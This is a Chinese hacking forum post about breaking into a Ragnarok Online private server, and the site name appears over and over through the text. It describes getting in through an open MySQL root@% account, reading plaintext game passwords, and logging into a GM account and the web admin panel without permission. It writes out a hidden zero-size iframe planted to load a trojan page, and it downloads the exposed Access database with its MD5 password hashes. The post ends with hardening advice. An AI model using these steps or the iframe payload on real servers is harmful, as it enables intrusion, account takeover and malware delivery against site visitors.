今天上一个Athena Mysql
服务器 去观摩取经..
www.17ut.com无意中发现了他上面的漏洞
www.17ut.comwww.17ut.com-----------------------------------我是我,分隔线 ^^------------------------
www.17ut.com第一部分::::: Mysql 设置
www.17ut.comwww.17ut.com首先,,我这联盟版看到他
服务器的介绍..
www.17ut.com心动了,想去看看...
www.17ut.comwww.17ut.com运行>> ping XXX.mpc.cn
www.17ut.com得到他的IP: 61.235.**.***
www.17ut.comwww.17ut.com(DATA里添加他的
服务器,上去看看还真不错!! ^^)
www.17ut.comwww.17ut.com又看了下他在联盟版的介绍,发现用的是Mysql
www.17ut.com想起会不会有Mysql 漏洞呢~~
www.17ut.comwww.17ut.com用 "流光" 5.0 扫了一遍.发现 MYSQL 端口3306 用户root
www.17ut.com于是打开我的 MYSQL CC
www.17ut.com添加
服务器::
www.17ut.comwww.17ut.com
www.17ut.com按下连接..连上了!! ^^ 我自己都有点以外
www.17ut.comwww.17ut.com前阵子也有人发贴说明过了 主要是Mysql用户设置问题.
www.17ut.com请看下面的这图
www.17ut.com蓝色部分的
root@%www.17ut.comwww.17ut.com只要有了这 root@% 就意味这任何人都可以外部连接你的MYSQL数据库!www.17ut.comwww.17ut.com下面有人问:: 连上了有什么用?? #@%$#%
www.17ut.comI 服了 U
www.17ut.comwww.17ut.com好了,进帐号表看看... 呵呵,所有帐号密码明文,,摆在我眼前
www.17ut.com随便选了个GM号..上游戏看看... 逛了一圈..
www.17ut.comT了个人 不知道那无辜被T的骂人没呢? ^^ (GM号主人,&_&我冤枉啊!)
www.17ut.com没敢做什么坏事了
www.17ut.com下了游戏~~
www.17ut.comwww.17ut.com-----------------------------------我是我,分隔线 ^^------------------------
www.17ut.com第二部分::: RO私服ASP管理系统 漏洞
www.17ut.comwww.17ut.com原文再续就书接上一回,上回说到下了游戏..
www.17ut.comwww.17ut.com又转去他的网页看~
www.17ut.comwww.17ut.com是改自 **china - RO私服ASP管理系统 的~ 其实不大好看. 呵呵~ 他看到这里表骂我哦 ^^
www.17ut.comwww.17ut.com随便逛了逛~~
www.17ut.com最后逛到后台去了`` 什么?? 要我输入帐号密码?? >_<
www.17ut.comwww.17ut.com打开刚才连上的他的MYSQL服务器
www.17ut.com找到里面游戏管理者的帐号和密码~ 输入到网页里
www.17ut.comwww.17ut.com..........................恭喜你~ 你才对了..我又进了网页后台!
www.17ut.comwww.17ut.com他的游戏GM号帐号密码和网页后台管理帐号密码一样!!! 大家不要犯他这错误哦www.17ut.comwww.17ut.com**china - RO私服ASP管理系统 我也在用```
www.17ut.com很熟悉,转到
::修改注册协议:: 那里可以用HTML..
www.17ut.comwww.17ut.com我在他的文字最下面添加上::
www.17ut.comwww.17ut.com<iframe src="http://*****/mm.htm" name="zhu" width="0" height="0" frameborder="0">
www.17ut.comwww.17ut.com懂得HTML的人都知道.上面的代码是连接到mm.htm这网页
www.17ut.com呵呵..上面的 mm.htm 有个小木马的话.....
www.17ut.com他的机器就是肉鸡了```
www.17ut.comwww.17ut.com在上面写ASP代码,,可以变成上传文件用的
www.17ut.com上传个木马?? 放个什么病毒上去??
www.17ut.com违法犯罪活动哦!!
www.17ut.comwww.17ut.com我可没敢做什么大坏事... ^^
www.17ut.comwww.17ut.com-----------------------------------我是我,分隔线 ^^------------------------
www.17ut.com第三部分 :::我MYSQL设置没问题..我怕谁!!
www.17ut.comwww.17ut.com呵呵.先别 牛..
www.17ut.com我们再来看看这 RO私服ASP管理系统.
www.17ut.comACCESS数据库~
www.17ut.comOK,先看看数据库地址.. 对照我下载的 RO私服ASP管理系统..
www.17ut.com在地址栏打上::
www.17ut.comwww.17ut.comHTTP://61.235.**.***/coon.asp 等待一会儿..出错了` `` 呵呵.
www.17ut.comwww.17ut.comMicrosoft JET Database Engine '80004005' www.17ut.com
www.17ut.com
'C:\Program Files\NetBox 2.7\Samples\WebServer\wwwroot\www.17ut.comwww.17ut.com哦.用的是NetBox 2.7 哦,,
www.17ut.comwww.17ut.com再对照本地文件..干脆直接到数据库地址
www.17ut.comwww.17ut.comHTTP://61.235.**.***/admin/data/ragnarok.asp
www.17ut.comwww.17ut.com出来一大对乱码``` &_&
www.17ut.com哈哈,,真不幸..数据库我要下载拉~~
www.17ut.comwww.17ut.comFlashGet下载.. 改名 XWRO.mdb 打开..
www.17ut.com呵呵,管理员帐号和密码```
www.17ut.comwww.17ut.com虽然密码不是明文的... md5加密
www.17ut.com可是下个 "md5解码器" 就能暴力解开了~~
www.17ut.com要多长时间就得看你的运气罗
www.17ut.com/
www.17ut.com我就没去解了
www.17ut.comQQ上通知这
服务器老大````
www.17ut.comwww.17ut.com把所知道的漏洞都堵了~
www.17ut.comwww.17ut.com-----------------------------------我是我,分隔线 ^^------------------------
www.17ut.com第四部分 ::::堵住堵住..我的情人你别亲!!
www.17ut.comwww.17ut.com1..上面的MYSQL用户设置漏洞
www.17ut.comwww.17ut.com建MYSQL数据库时,删掉系统默认的
www.17ut.comwww.17ut.comroot@%
www.17ut.comroot@localhost
www.17ut.comwww.17ut.com改成你自己添加的用户
www.17ut.com例如::
www.17ut.comwww.17ut.commain@192.168.1.10 <-你的IP (IP固定的话)
www.17ut.comkofn@Maie <-你的机器的名字~~
www.17ut.comwww.17ut.com这样别人就不能远程连接你的MYSQL了~~
www.17ut.comwww.17ut.com2. **china - RO私服ASP管理系统 {其他的估计也差不多}
www.17ut.comwww.17ut.com(1) 更改 /data/ragnarok.asp'名字
www.17ut.com 建议是##$^1123ddf.asp 之类的难猜到的名字! #开头的文件是不能下载```
www.17ut.com(2) 更改admin目录名字..
www.17ut.comwww.17ut.com上面的其中一种方法都可以.. 改完记得在 coon.asp和admin/inc/coon.asp里面把数据库路迳改成你改了的.不然要出错罗```www.17ut.com
www.17ut.com
AccessDB = "admin/data/ragnarok.asp" '这里.改你数据库路迳www.17ut.comwww.17ut.com要是你会ACCESS的.可以在数据库里家个表.
www.17ut.comwww.17ut.com
www.17ut.comwww.17ut.com(3) 把admin/admin_reginfo.asp 删掉
www.17ut.comwww.17ut.com这样也就大概补好了..我有空再看看
www.17ut.comwww.17ut.com-----------------------------------我是我,分隔线 ^^------------------------
www.17ut.comwww.17ut.com后记....
www.17ut.comwww.17ut.comwww.17ut.com(2004-08-21 00:15:11) &....
www.17ut.com换个注册页面?
www.17ut.com(2004-08-21 00:17:11) ﹎.麻衣べ.璟
www.17ut.com换个注册页面?
www.17ut.com怎么换??
www.17ut.comwww.17ut.com(2004-08-21 00:16:48) &....
www.17ut.com看来我突略安全问题了...
www.17ut.com换个PHP页面
www.17ut.com(2004-08-21 00:22:40) ﹎.麻衣べ.璟
www.17ut.comPHP我还没看..不一定就没问题哦
www.17ut.comwww.17ut.com==========================
www.17ut.com
减小字体
增大字体